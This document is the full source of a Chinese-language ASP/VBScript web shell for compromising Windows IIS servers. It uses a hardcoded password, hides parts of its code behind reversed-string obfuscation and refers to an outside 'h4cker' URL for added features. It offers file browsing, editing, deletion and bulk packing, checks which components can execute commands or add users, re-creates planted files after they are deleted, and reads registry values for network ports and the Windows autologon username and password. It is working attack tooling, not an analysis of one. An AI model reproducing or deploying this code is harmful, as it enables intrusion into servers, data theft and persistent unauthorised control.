<%@ LANGUAGE = VBScript.encode%><% Server.ScriptTimeout=999999999 UserPass ="admin" '密码,通用一句话,可用菜刀连接。 Copyright =" sea专用 " '名字版权 eror ="抱歉,密码错咯!" '密码错误显示的文字 SItEuRl ="http://baidu.com"' '你的博客地址 icot ="N" '此处N是登陆图案 可自定义修改从(A-Z a-z) GG ="我爱sea
我爱sea大大" '广告文字 '-------------------------------------------------------------------------------------------------- '****************************注意***************************************************************** htp ="http://odayexp.com/h4cker/mmgx/"'功能地址 这个你千万不能改 你改了大马就运行不鸟 '****************************注意***************************************************************** '-------------------------------------------------------------------------------------------------- URL=Request.ServerVariables("URL") OOOO=Request.ServerVariables("PATH_TRANSLATED") ServerIP=Request.ServerVariables("LOCAL_ADDR") Action=Request("Action") AChar=Request("AChar") If AChar="" Then AChar="GB2312" RootPath=Server.MapPath(".") WWWRoot=Server.MapPath("/") FolderPath=Request("FolderPath") serveru=Request.ServerVariables("http_host") serverp=userpass FName=Request("FName") ex=Request("ex") pth=Request("pth") zhenz=Request("zhenz") u=request.servervariables("http_host")&url findbq=Request("findbq") ASP_SELF=Request.ServerVariables("PATH_INFO") Addpath=Server.MapPath("\") Const ShowFileIco=false Response.Buffer =true On Error Resume Next sub ShowErr() If Err Then j"

" & Err.Description & "

" Err.Clear:Response.Flush End If end sub Sub j(str) response.write(str) End Sub Function RePath(S) RePath=Replace(S,"\","\\") End Function Function RRePath(S) RRePath=Replace(S,"\\","\") End Function Function ShiSanFun(ShiSanObjstr) ShiSanObjstr = Replace(ShiSanObjstr, "╁", """") For ShiSanI = 1 To Len(ShiSanObjstr) If Mid(ShiSanObjstr, ShiSanI, 1) <> "╋" Then ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr Else ShiSanNewStr = vbCrLf + ShiSanNewStr End If Next ShiSanFun = ShiSanNewStr End Function cdx="": cxd="N": zxc=22+73: ef="": set fso=server.CreateObject("Scripting.FileSystemObject"): set fsoX=server.CreateObject("Scripting.FileSystemObject"): str1="http://"&Request.ServerVariables("SERVER_Name")& left(Request.ServerVariables("URL"),InstrRev(Request.ServerVariables("URL"),"/")): BackUrl="

":j""&Copyright&" - "&ServerIP&" " j "":j"" Dim ObT(19,2): Fn=Action:ObT(0,0) = "Scripting.FileSystemObject": ObT(0,2) = "文 件 操 作 组 件": ObT(1,0) = "wscript.shell": ObT(1,2) = "命令行执行组件": ObT(2,0) = "ADOX.Catalog": ObT(2,2) = "ACCESS 建 库 组 件": ObT(3,0) = "JRO.JetEngine": ObT(3,2) = "ACCESS 压 缩 组 件": ObT(4,0) = "Scripting.Dictionary": ObT(4,2) = "数据流 上 传 辅助 组件": ObT(5,0) = "Adodb.connection": ObT(5,2) = "数据库 连接 组件": ObT(6,0) = "Adodb.Stream": ObT(6,2) = "数据流 上传 组件": ObT(7,0) = "SoftArtisans.FileUp": ObT(7,2) = "SA-FileUp 文件 上传 组件": ObT(8,0) = "LyfUpload.UploadFile": ObT(8,2) = "刘云峰 文件 上传 组件": ObT(9,0) = "Persits.Upload.1": ObT(9,2) = "ASPUpload 文件 上传 组件": ObT(10,0) = "JMail.SmtpMail": ObT(10,2) = "JMail 邮件 收发 组件": ObT(11,0) = "CDONTS.NewMail": ObT(11,2) = "虚拟SMTP 发信 组件": ObT(12,0) = "SmtpMail.SmtpMail.1": ObT(12,2) = "SmtpMail 发信 组件": ObT(13,0) = "Microsoft.XMLHTTP": ObT(13,2) = "数据 传输 组件" ObT(14,0) = "ws"&"cript.shell.1": OBt(14,2) = "如果wsh被禁,可以改用这个组件": OBT(15,0) = "WS"&"CRIPT.NETWORK": OBt(15,2) = "查看服务器信息的组件,有时可以用来提权": OBT(16,0) = "she"&"ll.appl"&"ication": OBt(16,2) = "she"&"ll.appli"&"cation 操作,无FSO时操作文件以及执行命令": OBT(17,0) = "sh"&"ell.appl"&"ication.1": OBt(17,2) = "she"&"ll.appli"&"cation 的别名,无FSO时操作文件以及执行命令": OBT(18,0) = "Shell.Users":OBt(18,2) = "删除了net.exe net1.exe的情况下添加用户的组件":OBT(19,0) = "MSXML2.ServerXMLHTTP":OBt(19,2) = "MSXML2.ServerXMLHTTP" For i=0 To 19:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" √":Else:IsObj=" ×":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if: j"" mm=ShowErrs Function StreamLoadFromFile(sPath) Dim oStream Set oStream = Server.CreateObject("Adodb.Stream") With oStream .Type = 1 .Mode = 3 .Open .LoadFromFile(sPath) .Position = 0 StreamLoadFromFile = .Read .Close End With Set oStream = Nothing End Function Function MainForm() execute(shisanfun("╁>elbat/<>rt/<>dt/<╁j╋╁>emarfi/<>'1'=redrobemarf '%001'=thgieh '%001'=htdiw 'eliF1wohS=noitcA?'=crs 'emarFeliF'=eman emarfi<╁j╋╁>'%011'=htdiw dt<╁j╋╁>dt/<>emarfi/<>'0'=redrobemarf '%001'=thgieh '%001'=htdiw 'uneMniaM=noitcA?'=crs 'tfeL'=eman emarfi<╁j:╁>'%31'=htdiw dt<>rt<>rt/<>dt/<>retnec/<>elbat/<>mrof/<>rt/<>dt/<╁j╋╁>dt<>dt/<』>a/')╁╁\\stnemucoD\\sresU llA\\sgnitteS dna stnemucoD\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\pmeT\\swodniw\\:c╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\atad\\vrsteni\\23metsys\\SWODNIW\\:c╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\gifnoc\\23metsys\\SWODNIW\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\revreS LQS tfosorciM\\seliF margorP\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁laeR\\seliF margorP\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\u-vres\\seliF margorP\\:c╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\erehwynAcp\\cetnamyS\\ataD noitacilppA\\sresU llA\\sgnitteS dna stnemucoD\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\RELCYCER\\:D╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\RELCYCER\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/<序程 >b/<→>b< 始开>')╁╁\\序程\\单菜」始开「\\sresU llA\\sgnitteS dna stnemucoD\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁\\sresU llA\\sgnitteS dna stnemucoD\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『』>a/')╁╁seliF margorP\\:C╁╁(redloFwohS:tpircsavaj'=ferh a<『:录目权提 >rt<╁j╋╁>'elddim'=ngilav 'retnec'=ngila rt< ╁j╋ ╁>')(daoler.noitacol.emarFeliF'=kcilcno '新刷'=eulav 'timbus'=epyt tupni< >'到转'=eulav 'timbus'=epyt 'timbuS'=eman tupni<>'retnec'=ngila '041'=htdiw dt<>dt/<╁j╋╁>'╁&)╁htaPredloF╁(noisseS&╁'=eulav '%001:htdiw'=elyts 'htaPredloF'=eman tupni<╁j╋╁>dt<>dt/<:栏址地>'retnec'=ngila '06'=htdiw dt<>rt<╁j╋╁>'tnerap_'=tegrat '╁&LRU&╁'=noitca 'tsop'=dohtem 'mrofrdda'=eman mrof<╁j╋╁>'%001'=htdiw elbat<╁j╋╁>'2'=napsloc '03'=thgieh dt<>rt<╁j╋╁>'0'=gnicapsllec '0'=gniddapllec 0=redrob '%001'=thgieh '%001'=htdiw elbat<╁j╋╁>mrof/<╁j╋╁>╁╁emaNF╁╁=eman ╁╁neddih╁╁=epyt tupni<╁j╋╁>╁╁noitcA╁╁=eman ╁╁neddih╁╁=epyt tupni<╁j╋╁>╁╁emarFeliF╁╁=tegrat ╁╁╁&LRU&╁╁╁=noitca ╁╁tsop╁╁=dohtem ╁╁mrofedih╁╁=eman mrof<╁j")) End Function servrer="

" Sub PageAddToMdb() Dim theAct, thePath theAct = Request("theAct") thePath = Request("thePath") Server.ScriptTimeOut=100000 If theAct = "addToMdb" Then addToMdb(thePath) j "

"&BackUrl Response.End End If If theAct = "releaseFromMdb" Then unPack(thePath) j "

"&BackUrl Response.End End If j"

注: 打包生成HSH.mdb文件,位于sam木马同级目录下


注: 解开来的所有文件都位于本程序目录下
" End Sub Sub addToMdb(thePath) On Error Resume Next Dim rs, conn, stream, connStr, adoCatalog Set rs = Server.CreateObject("ADODB.RecordSet") Set stream = Server.CreateObject("ADODB.Stream") Set conn = Server.CreateObject("ADODB.Connection") Set adoCatalog = Server.CreateObject("ADOX.Catalog") connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb") adoCatalog.Create connStr conn.Open connStr conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)") stream.Open stream.Type = 1 rs.Open "FileData", conn, 3, 3 If Request("theMethod") = "fso" Then fsoTreeForMdb thePath, rs, stream Else saTreeForMdb thePath, rs, stream End If rs.Close Conn.Close stream.Close Set rs = Nothing Set conn = Nothing Set stream = Nothing Set adoCatalog = Nothing End Sub Function fsoTreeForMdb(thePath, rs, stream) Dim item, theFolder, folders, files, sysFileList sysFileList = "$HSH.mdb$HSH.ldb$" If Server.CreateObject("Scripting.FileSystemObject").FolderExists(thePath) = False Then showErr(thePath & " 目录不存在或者不允许访问!") End If Set theFolder = Server.CreateObject("Scripting.FileSystemObject").GetFolder(thePath) Set files = theFolder.Files Set folders = theFolder.SubFolders For Each item In folders fsoTreeForMdb item.Path, rs, stream Next For Each item In files If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then rs.AddNew rs("thePath") = Mid(item.Path, 4) stream.LoadFromFile(item.Path) rs("fileContent") = stream.Read() rs.Update End If Next Set files = Nothing Set folders = Nothing Set theFolder = Nothing set fso=nothing End Function Sub unPack(thePath) On Error Resume Next Server.ScriptTimeOut=100000 Dim rs, ws, str, conn, stream, connStr, theFolder str = Server.MapPath(".") & "\" Set rs = CreateObject("ADODB.RecordSet") Set stream = CreateObject("ADODB.Stream") Set conn = CreateObject("ADODB.Connection") connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";" conn.Open connStr rs.Open "FileData", conn, 1, 1 stream.Open stream.Type = 1 Do Until rs.Eof theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\")) If Server.CreateObject("Scripting.FileSystemObject").FolderExists(str & theFolder) = False Then createFolder(str & theFolder) End If stream.SetEos() stream.Write rs("fileContent") stream.SaveToFile str & rs("thePath"), 2 rs.MoveNext Loop rs.Close conn.Close stream.Close Set ws = Nothing Set rs = Nothing Set stream = Nothing Set conn = Nothing End Sub Sub createFolder(thePath) Dim i i = Instr(thePath, "\") Do While i > 0 If Server.CreateObject("Scripting.FileSystemObject").FolderExists(Left(thePath, i)) = False Then Server.CreateObject("Scripting.FileSystemObject").CreateFolder(Left(thePath, i - 1)) End If If InStr(Mid(thePath, i + 1), "\") Then i = i + Instr(Mid(thePath, i + 1), "\") Else i = 0 End If Loop End Sub Sub saTreeForMdb(thePath, rs, stream) Dim item, theFolder, sysFileList sysFileList = "$HSH.mdb$HSH.ldb$" Set theFolder = saX.NameSpace(thePath) For Each item In theFolder.Items If item.IsFolder = True Then saTreeForMdb item.Path, rs, stream Else If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then rs.AddNew rs("thePath") = Mid(item.Path, 4) stream.LoadFromFile(item.Path) rs("fileContent") = stream.Read() rs.Update End If End If Next Set theFolder = Nothing End Sub Function ProFile() If Request("Action2")="Post" Then Randomize dim pass2,num1 pass2="" Do While Len(pass2)<8 if Len(pass2)<=4 then num1=CStr(Chr((122-97)*rnd+97)) 'a~z else num1=CStr(Chr((57-48)*rnd+48)) '0~9 end if pass2=pass2&num1 loop pass2=ucase(pass2) Application(pass2)=1 Application(pass2&"File")=request("AFile") Application(pass2&"Code")=request("ACode") Application(pass2&"Time")=request("ATime") Application(pass2&"Char")=request("AChar") j"

保护进程 "&pass2&" 生成成功!点击这里启动进程。

" Response.End End If SI="
" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"
" SI=SI&"
文件编码:GB2312 UTF-8 (访问文件若出现乱码,请尝试更改编码)
保护频率: 秒 (最小为1秒,需要保护的文件越多,频率设置越大,否则无法全部保护)
" j SI End Function if request("ProFile")<>"" then on error resume next if Application(request("ProFile"))=1 then Set fsoXX = Server.CreateObject("Scripting.FileSystemObject") if request("DelCon")=1 then Application(request("ProFile")&"Con")="" response.redirect Url&"?ProFile="&request("ProFile")&"" response.end end if DIM rline,rline2 rline2=Application(request("ProFile")&"Code") rline2=rline2&vbcrlf j"" j"清空日志  要想解除保护,直接关闭页面即可。
" for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf) FileUrl=trim(FileUrl) if fsoXX.FileExists(FileUrl) then Set txt = fsoXX.OpenTextFile(FileUrl,1,true) rline="" if Not txt.AtEndOfStream then rline=txt.ReadAll end if if rline2<>rline then txt.close fsoX.GetFile(FileUrl).Attributes=32 if Application(request("ProFile")&"Char")=1 then set myfileee = fsoXX.CreateTextFile(FileUrl,true) else set myfileee = fsoXX.CreateTextFile(FileUrl,true,true) end if myfileee.writeline Application(request("ProFile")&"Code") Application(request("ProFile")&"Con")=now()&" "&FileUrl&" 被更改,已恢复
"&Application(request("ProFile")&"Con") else Application(request("ProFile")&"Con")=now()&" "&FileUrl&" √
"&Application(request("ProFile")&"Con") txt.close end if else if Application(request("ProFile")&"Char")=1 then set myfileee = fsoXX.CreateTextFile(FileUrl,true) else set myfileee = fsoXX.CreateTextFile(FileUrl,true,true) end if myfileee.writeline Application(request("ProFile")&"Code") Application(request("ProFile")&"Con")=now()&" "&FileUrl&" 被删除,已恢复
"&Application(request("ProFile")&"Con") end if next if ubound(split(Application(request("ProFile")&"Con"),"
"))>=40 then dim ashowic for ashowi=0 to 40 ashowic=ashowic&split(Application(request("ProFile")&"Con"),"
" next Application(request("ProFile")&"Con")=ashowic end if j Application(request("ProFile")&"Con") else j servrer if request("ProFile")=AChar then il x (mm) end if response.end end if Function MainMenu() j"":If ObT(0,1)=" ×" Then :j"" :Else: j"" End If: j"" Next End Function Function IsIco(ia,ib,ta) If ShowFileIco=true Then IsIco = " " If ib<>"" Then IsIco = " " End If Else IsIco = " "&ta&"" End If End Function Function FileIco(FName) If ShowFileIco=true Then TypeList = ".asp.asa.bat.bmp.com.doc.db.dll.exe.gif.htm.html.inc.ini.jpg.js.log.mdb.mid.mp3.png.php.rm.rar.swf.txt.wav.xls.xml.zip.jsp.aspx.;" FileType = lcase(Mid(FName, InstrRev(FName,".")+1)) If Instr(TypeList,"."&FileType)>0 then Ico = FileType&".gif" Else Ico = "default.gif" End If FileIco = " " Else FileIco="" End If End Function Function Show1File(Path) execute(shisanfun("fi dne╋esle╋gnihtoN=DLOF teS╋╁>elbat/<╁&IS j╋txeN╋fi dne╋fi dne╋╁ko╁=)emaN.L(noisses╋neht ╁ko╁ >< )emaN.L(noisses fi╋neht ╁ko╁=)╁tcA╁(tseuqer fi╋1+i=i╋╁>rt/<>dt/<╁&)╁-╁,╁/╁,deifidoMtsaLetaD.L(ecalper j╋╋╁>dt<>dt/<>a/'动移'=eltit 'ma'=ssalc ')╁╁eliFevoM╁╁,╁╁╁&)emaN.L&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a< >a/'制复'=eltit 'ma'=ssalc ')╁╁eliFypoC╁╁,╁╁╁&)emaN.L&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a< >a/'除删'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno ')╁╁eliFleD╁╁,╁╁╁&)emaN.L&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a< ╁ j╋╁)╁&setubirtta.l&╁(╁ j╋ fi dne╋╁√╁j╋esle╋╁>tnof/der=roloc '1'=ezis 'sgnidbew'=ecaf tnof<╁j╋neht 0=KOOtidE fi╋fI dnE╋0=KOOtidE:1 - VOOtidE = VOOtidE╋nehT 1 => VOOtidE fI╋fI dnE╋0=KOOtidE:2 - VOOtidE = VOOtidE╋nehT 2 => VOOtidE fI╋fI dnE╋0=KOOtidE:4 - VOOtidE = VOOtidE╋nehT 4 => VOOtidE fI╋fI dnE╋8 - VOOtidE = VOOtidE╋nehT 8 => VOOtidE fI:fI dnE╋61 - VOOtidE = VOOtidE╋nehT 61 => VOOtidE fI╋fI dnE╋23 - VOOtidE = VOOtidE╋nehT 23 => VOOtidE fI╋fI dnE╋46 - VOOtidE = VOOtidE╋nehT 46 => VOOtidE fI╋fI dnE╋821 - VOOtidE = VOOtidE╋nehT 821 => VOOtidE fI╋setubirttA.l=VOOtidE╋1=KOOtidE╋KOOtidE miD╋╁>a/<限权>'限权'=eltit 'ma'=ssalc '###'=ferh ╁╁)'002=thgieh,003=htdiw,0=elbaziser,0=srabllorcs,0=rabunem,0=sutats,0=seirotcerid,0=noitacol,0=rabloot','rewoPtidE','╁&)emAn.L&╁\╁&hTaP(htApeR&╁=htaPrewoP&rewoPtidE=noitcA?'(nepo.wodniw╁╁=kcilcno a<╁ j╋╁ >a/'辑编'=eltit 'ma'=ssalc ')╁╁eliFtidE╁╁,╁╁╁&)emaN.L&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a<╁ j╋╁ >a/'件文开打lrU过通'=eltit 'ma'=ssalc ╁╁╁&)emAn.L&╁\╁&hTaP(lrUnepo&╁╁╁=ferh a<╁ j╋fi dne╋╁>dT<>dt/<╁&epyT.L&╁>dT<>dt/dT<>a/<╁&emaN.L&╁ >'载下'=eltit ';)╁╁eliFnwoD╁╁,╁╁╁&)emaN.L&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a<╁ j╋esle╋╁>dT<>dt/<╁&epyT.L&╁>dT<>dt/dT<>a/<>tnof/<)件文要重或页首( ╁&)emaN.L(esacl&╁ >der=roloc tnof< >'载下'=eltit ';)╁╁eliFnwoD╁╁,╁╁╁&))emaN.L(esacl&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a<╁ j╋nehT 0>)╁gifnoc╁,)emaN.L(esacl(rtsnI ro 0>)╁nnoc╁,)emaN.L(esacl(rtsnI ro 0>)╁tluafed╁,)emaN.L(esacl(rtsnI ro 0>)╁xedni╁,)emaN.L(esacl(rtsnI fiesle╋╁>dT<>dt/<╁&epyT.L&╁>dT<>dt/dT<>a/<>tnof/<)认确请,件文法非是能可( ╁&emaN.L&╁ >wolley=roloc tnof< >'载下'=eltit ';)╁╁eliFnwoD╁╁,╁╁╁&)emaN.L&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a<╁ j╋ nehT 0>)╁kcah╁,)emaN.L(esacl(rtsnI ro 0>)╁amum╁,)emaN.L(esacl(rtsnI ro 0>)╁igc.╁,)emaN.L(esacl(rtsnI ro ╁psa.nooc╁=)emaN.L(esacl ro 0>)╁nooc╁,)emaN.L(esacl(rtsnI ro 0>)╁nmoc╁,)emaN.L(esacl(rtsnI ro 0>)╁otcudorp╁,)emaN.L(esacl(rtsnI ro 0>)╁P0T╁,)emaN.L(esacu(rtsnI ro 0>)╁rth.╁,)emaN.L(esacl(rtsnI ro 0>)╁xdc.╁,)emaN.L(esacl(rtsnI ro 0>)╁rec.╁,)emaN.L(esacl(rtsnI ro 0>)╁asa.╁,)emaN.L(esacl(rtsnI ro 0>)╁;╁,emaN.L(rtsnI fi╋)emaN.L(ocIeliF j╋╁>'02'=thgieh dt<>╁╁'212121#'=roloCdnuorgkcab.elyts.siht╁╁=tuOesuoMno ╁╁'969696#'=roloCdnuorgkcab.elyts.siht╁╁=revOesuoMno ╁╁212121#:roloc-dnuorgkcab╁╁=elyts rt<╁j╋╋selif.dloF ni L hcaE roF╋╋╁>dt/<>dt<>dt/<>b/x=di b<>s=di dt<>dt/<>b/x=di b<>s=di dt<>dt/<>b/x=di b<>s=di dt<>dt/<>b/x=di b<>22=thgieh s=di dt<>dt/<>b/x=di b<>s=di dt<>rt<>retnec=ngila '%001'=htdiw elbat<╁j╋0=i:╁╁=IS : ╁╁& IS j╋╁>elbat/<>rt/<>dt/<>2=thgieh dt<>rt<>rt/<╁&IS=IS╋txeN╋╁>rt<>rt/<╁&IS=IS neht 0=6 dom i fI╋1+i=i╋╁>dt/<>vid/< >a/'动移'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno ')╁╁redloFevoM╁╁,╁╁╁&)emaN.F&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a< >a/'除删'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno ')╁╁redloFleD╁╁,╁╁╁&)╁\\╁,╁\╁,emaN.F&╁\╁&htaP(ecalpeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a< >a/'制复'=eltit 'ma'=ssalc ')(kosey nruter'=kcilcno ')╁╁redloFypoC╁╁,╁╁╁&)emaN.F&╁\╁&htaP(htaPeR&╁╁╁(mroFlluF:tpircsavaj'=ferh a<>rb<>a/<╁&emaN.F&╁>rb<╁&)╁0╁,╁fig.redlof╁,╁╁(ocIsI&╁>╁╁入进╁╁=eltit ')╁╁╁&)emaN.F&╁\╁&htaP(htaPeR&╁╁╁(redloFwohS:tpircsavaj'=ferh a<╁&is=is╋╁>'xp4:mottob-gniddap;838383# dilos xp1:redrob'=elyts vid<>retnec=ngila %71=htdiw 01=thgieh dt<╁&IS=IS╋sredlofbus.DLOF ni F hcaE roF╋╁>retnec/<>a/<>b/<页上回返>b<>'emarFeliF'=tegrat 'kcabog=noitcA?'=ferh a<>retnec<╁ j╋ ╁>rt<>'6'=gniddapllec '0'=gnicapsllec '0'=redrob '%001'=htdiw elbat<╁=IS╋0=i╋)htaP(redloFteG.FC=DLOF teS╋neht 8=))111(rhc,pth(rtsni fi")) End function: Function DelFile(Path) If CF.FileExists(Path) Then CF.DeleteFile Path SI="

恭喜您文件 "&Path&" 删除成功!
" SI=SI&BackUrl j SI End If End Function function ReadFromTextFile (FileUrl,CharSet) dim str set stm=server.CreateObject("adodb.stream") stm.Type=2 stm.mode=3 stm.charset=CharSet stm.open stm.loadfromfile FileUrl str=stm.readtext stm.Close set stm=nothing ReadFromTextFile=str end function Sub WriteToTextFile (FileUrl,byval Str,CharSet) set stm=server.CreateObject("adodb.stream") stm.Type=2 stm.mode=3 stm.charset=CharSet stm.open stm.WriteText str stm.SaveToFile FileUrl,2 stm.flush stm.Close set stm=nothing end Sub Function EditFile(Path) If Request("Action2")="Post" Then WriteToTextFile Path,Request.form("content"),AChar SI="

" SI=SI&BackUrl j SI if request("id1")=1 then j"" Response.End End If Dim GBcheck,UTcheck GBcheck=" checked" UTcheck="" If AChar="UTF-8" Then GBcheck="" UTcheck=" checked" End If If Path<>"" Then Txt=ReadFromTextFile(Path,AChar) Else Path=Session("FolderPath")&"\newfile.asp":Txt="hello world!" End If j "
" j"" j"
" j"

" j"   " j"   " j"GB2312 UTF-8  注:本功能只在编辑文件时可用|   " j"锁定 " j"" End Function :Function CopyFile(Path) Path=Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.CopyFile Path(0),Path(1) SI="

" SI=SI&BackUrl j SI End If End Function Function MoveFile(Path) Path=Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.MoveFile Path(0),Path(1) SI="

" SI=SI&BackUrl j SI End If End Function Function DelFolder(Path) If CF.FolderExists(Path) Then CF.DeleteFolder Path SI="

" SI=SI&BackUrl End If End Function Function CopyFolder(Path) Path=Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.CopyFolder Path(0),Path(1) SI="

" SI=SI&BackUrl j SI End If End Function Function MoveFolder(Path) Path=Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.MoveFolder Path(0),Path(1) SI="

" SI=SI&BackUrl j SI End If End Function Function NewFolder(Path) If Not CF.FolderExists(Path) and Path<>"" Then CF.CreateFolder Path SI="

" SI=SI&BackUrl j SI End If End Function End Class sub getTerminalInfo() on error resume next dim wsh set wsh=createobject("Wscript.Shell") j"[网络"&"探测]

" EnableTCPIPKey="HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters" isEnable=Wsh.Regread(EnableTcpipKey) If isEnable=0 or isEnable="" Then Notcpipfilter=1 End If ApdKey="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind" Apds=Wsh.RegRead(ApdKey) If IsArray(Apds) Then For i=LBound(Apds) To UBound(Apds)-1 ApdB=Replace(Apds(i),"\Device\","") j"网卡"&i&"的序列为:"&ApdB&"
" Path="HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\" IPKey=Path&ApdB&"\IPAddress" IPaddr=Wsh.Regread(IPKey) If IPaddr(0)<>"" Then For j=Lbound(IPAddr) to Ubound(IPAddr) j"
  • IP地"&"址"&j&"为:"&IPAddr(j)&"
    " Next Else j"
  • IP地"&"址无法读取"&"或没有设置
    " End if GateWayKey=Path&ApdB&"\DefaultGateway" GateWay=Wsh.Regread(GateWayKey) If isarray(GateWay) Then For j=Lbound(Gateway) to Ubound(Gateway) j"
  • 网关"&j&":"&Gateway(j)&"
    " Next Else j"
  • 网关无法读取或没有设置
    " End if DNSKey=Path&ApdB&"\NameServer" DNSstr=Wsh.RegRead(DNSKey) If DNSstr<>"" Then j"
  • 网卡"&"DNS为:"&DNSstr&"
    " Else j"
  • 默认"&"DNS无法读取或没有设置
    " End If if Notcpipfilter=1 Then j"
  • 没Tcp/IP筛选
    " else ETK="\TCPAllowedPorts" EUK="\UDPAllowedPorts" FullTCP=Path&ApdB&ETK FullUDP=path&ApdB&EUK tcpallow=Wsh.RegRead(FullTCP) If tcpallow(0)="" or tcpallow(0)=0 Then j"
  • 允许"&"的tcp端口为:全部
    " Else j"
  • 允许"&"的tcp端口为:" For j = LBound(tcpallow) To UBound(tcpallow) j tcpallow(j)&"," Next j"
    " End if udpallow=Wsh.RegRead(FullUDP) If udpallow(0)="" or udpallow(0)=0 Then j"
  • 允许"&"的udp端口为:全部
    " Else j"
  • 允许"&"的udp端口为:" for j = LBound(udpallow) To UBound(udpallow) j UDPallow(j)&"," next j"
    " End if End if j"------------------------------------------------
    " Next end if j"


    " Telnetkey="HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\TelnetServer\1.0\TelnetPort" TlntPort=Wsh.RegRead(TelnetKey) if TlntPort="" Then Tlnt="23(默认"&"设置)" j"
  • Telnet端"&"口:"&Tlntport&"
    " TermKey="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber" TermPort=Wsh.RegRead(TermKey) If TermPort="" Then TermPort="无法"&"读取.请确认"&"是否为Windows Server版本主机" j"
  • Terminal Service端口为:"&TermPort&"
    " If TermPort<>"" Then end if pcAnywhereKey="HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort" PAWPort=Wsh.RegRead(pcAnywhereKey) If PAWPort="" then PAWPort="无法"&"获取.请确认"&"主机是"&"否安装pcAnywhere" j"
  • PcAnywhere端口为:"&PAWPort&"
    " j"------------------------------------------------------" Set wsX = Server.CreateObject("WScript.Shell") Dim terminalPortPath, terminalPortKey, termPort Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" terminalPortKey = "PortNumber" termPort = wsX.RegRead(terminalPortPath & terminalPortKey) j"终端_服务端口"&"及自动登录
      " If termPort = "" Or Err.Number <> 0 Then j"无法得到终端端口, 检查权限是否受到限制.
      " Else j"当前终端服务"&"端口: " & termPort & "
      " End If autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" autoLoginEnableKey = "AutoAdminLogon" autoLoginUserKey = "DefaultUserName" autoLoginPassKey = "DefaultPassword" isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey) If isAutoLoginEnable = 0 Then Else autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey) j"自动登录"&"的系统帐户: " & autoLoginUsername & "
      " autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey) If Err Then Err.Clear j"False" End If j"自动登录"&"的帐户密码: " & autoLoginPassword & "
      " End If j"
    " j"


    " SoftPath=Wsh.Environment.item("Path") Pathinfo=lcase(SoftPath) j"系统软"&"件支持:" if Instr(Pathinfo,"perl") Then j"
  • Perl脚本_:支持
    " if instr(Pathinfo,"java") Then j"
  • Java脚本_:支持
    " if instr(Pathinfo,"microsoft sql server") Then j"
  • MSSQL数据库服务_:支持
    " if instr(Pathinfo,"mysql") Then j"
  • MySQL数据库服务_:支持
    " if instr(Pathinfo,"oracle") Then j"
  • Oracle数据库服务_:支持
    " if instr(Pathinfo,"cfusionmx7") Then j"
  • CFM服务器_:支持
